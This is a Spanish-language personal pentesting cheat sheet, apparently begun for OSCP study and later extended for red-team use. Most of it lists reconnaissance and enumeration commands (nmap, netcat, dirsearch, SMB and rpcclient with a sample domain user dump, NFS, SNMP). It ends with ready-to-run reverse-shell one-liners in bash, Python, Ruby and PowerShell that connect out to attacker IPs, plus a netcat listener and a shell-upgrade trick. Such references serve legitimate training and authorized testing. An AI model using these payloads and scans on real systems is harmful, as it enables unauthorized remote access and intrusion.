
Hay muchas hojas de trucos por ahí, pero esta es la mía.
Hay muchas hojas de referencia por ahí, pero esta es la mía. Es un trabajo en progreso ahora mismo, y vive como un borrador que se actualiza mucho, a veces. Lo empecé mientras estudiaba para mi OSCP, pero ahora está evolucionando para incluir cosas más prácticas que necesito como red teamer. Las nuevas adiciones probablemente no sirvan para el examen, e incluso pueden incluir herramientas que están prohibidas.
Muy incompleto...
find / -name flag.txt para encontrar archivos por nombre.
grep -R "flag40" / -s -n buscar cadenas en archivos, recorriéndolos recursivamente desde el directorio raíz, sin salida de errores.
dir /s flag.txt para encontrar archivos llamados flag.txt en el directorio actual y subdirectorios.
Una herramienta útil -> wadcoms.github.io
nmap -sn 10.11.1.0/24 barrido de red para encontrar hosts.
nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt barrido de red para IPs que estén activas, y guardar las direcciones IP en una lista.nmap -A 10.10.10.10 para un escaneo rápido de puertos TCP comunes con detección de OS y servicios.
nmap -A 10.10.10.10 -p- para escanear todos los puertos TCP con detección de OS y servicios.
nmap -A -sU 10.10.10.10 para escanear todos los puertos UDP con detección de OS y servicios.
sudo nmap -O -A -sV 10.10.10.10 para escanear todos los puertos TCP comunes, identificar el sistema operativo, ejecutar scripts y capturar banners.
proxychains nmap -Pn -sT 10.10.10.10 -v porque los escaneos ICMP/UDP no funcionan.
La bandera -w para especificar el tiempo de espera en segundos y la bandera -z para enviar cero datos (para escaneo)
nc -nvv -w 1 -z 10.11.1.220 3388-3390 escaneo TCP de los puertos 3388-3390.
nc -nv -u -z -w 1 10.11.1.115 160-162 escaneo UDP de los puertos 160-162.
gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt.También me gusta dirsearch.
Listas de palabras útiles en Kali
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r enumeración de directorios con big.txt de dirb, copia/pega y solo IP/URL y extensiones.
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r enumeración de directorios con la lista de directorios de dirbuster, copia/pega y solo IP/URL y extensiones.
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r, fuerza bruta de CGI.
Un módulo rsync es esencialmente un recurso compartido de directorio. Estos módulos pueden estar opcionalmente protegidos por una contraseña. Esta opción lista los módulos disponibles y, opcionalmente, determina si el módulo requiere contraseña para acceder**:**.
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
smbclient -L 10.11.1.146 Para listar los recursos compartidos disponibles
smbclient //10.11.1.146/IPC$ para iniciar sesión en ese recurso compartido. Si eso no funciona, intenta con sudo... sudo smbclient //10.11.1.146/IPC$
enum4linux 10.11.1.146 -a -o para usar enum4linux y automatizar el recurso compartido SMB.
Si puedes conectarte con inicio de sesión Null -> rpcclient -U '' -N forest.htb.
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 105
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
showmount -e 10.10.10.10 para ver los montajes disponibles
mount -t nfs 10.10.10.10:/ /tmp -o nolock para montar la raíz, o cualquier carpeta.
onesixtyone -c community -i ips escanea la red objetivo para identificar servidores SNMP, donde community e ips son listas; community = (public, private, manager).
snmp-check 10.11.1.227 hace todo lo siguiente, pero mejor y te lo formatea bien :)
snmpwalk -c public -v1 -t 10 10.11.1.115 enumera todo el árbol MIB.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 enumera usuarios de Windows.
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 enumera los procesos de Windows en ejecución.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 enumera los puertos TCP abiertos.
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 enumera el software instalado.
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc -lvp 4444 escuchar (capturar) una reverse shell con Netcat en el puerto 4444
python -c 'import pty; pty.spawn("/bin/bash")' o python3 -c 'import pty; pty.spawn("/bin/bash")'